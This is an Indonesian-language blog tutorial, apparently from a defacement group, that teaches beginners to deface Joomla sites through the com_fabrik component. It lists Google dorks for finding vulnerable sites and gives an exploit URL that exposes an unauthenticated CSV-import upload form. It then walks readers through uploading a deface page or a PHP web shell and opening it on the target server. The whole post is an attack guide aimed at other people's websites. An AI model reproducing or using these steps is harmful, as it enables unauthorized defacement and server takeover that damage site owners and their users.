CARA DEFACE DENGAN COM_FABRIK - Whats'up guyss, kali ini gua mau share cara deface web menggunakan metode com_fabrik, yang gua tau sih com_fabrik tuh semacem nitip file di web tertentu :). Inget, ini khusus buat pemula, yang udah master minggir dulu yaaa, sorry ster :) bahan-bahannya cuma dork, exploit sama script deface. Bahan-bahan ada dibawah. Langsung aja kita liat tutornya di TKP :)
*DORK
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
inurl:viewtable?cid= intext:sorry this form is not published NB: pilih salah satu diantara dork dork diatas, SITE bisa diubah menjadi (.net .id .il dll. )
kreasiin sendiri supaya dapet website yang masih verawan h3h3 :v
*EXPLOIT
*DORKING DENGAN DORK YANG DIATAS
*PILIH SALAH SATU YANG MAU DI TUSBOL :D
*MASUKKAN EXPLOIT YANG DIATAS
CONTOH
TARGET.CO.LI/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
*JIKA VULN, MAKA FORM UPLOAD SEPERTI GAMBAR DIBAWAH
*KLIK CHOOSE FILE KEMUDIAN PILIH SCRIPT DEFACE AGAN, TERUS KLIK "IMPORT CSV"
*TUNGGU SEBENTAR, KALO MUNCULNYA HALAMAN EROR BERARTI AGAN BERHASIL
DEFACE WEBSITE ITU :)
CONTOH
target.co.li/media/pacman.html*WARNING: kalo tadi agan meng upload file yang ber format .php (shell) berarti agan harus ketik seperti ini => target.co,li/media/shell_agan.php
*NAH KALO SUDAH AGAN BISA LIAT HASILNYA, BOOOMMM
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!!!"
SEKIAN TUTORIAL DEFACE DARI KAMI SAMPAI BERJUMPA DIPOSTINGAN BERIKUTNYA
Greetz : PACMAN CORP UNION
No comments:
Post a Comment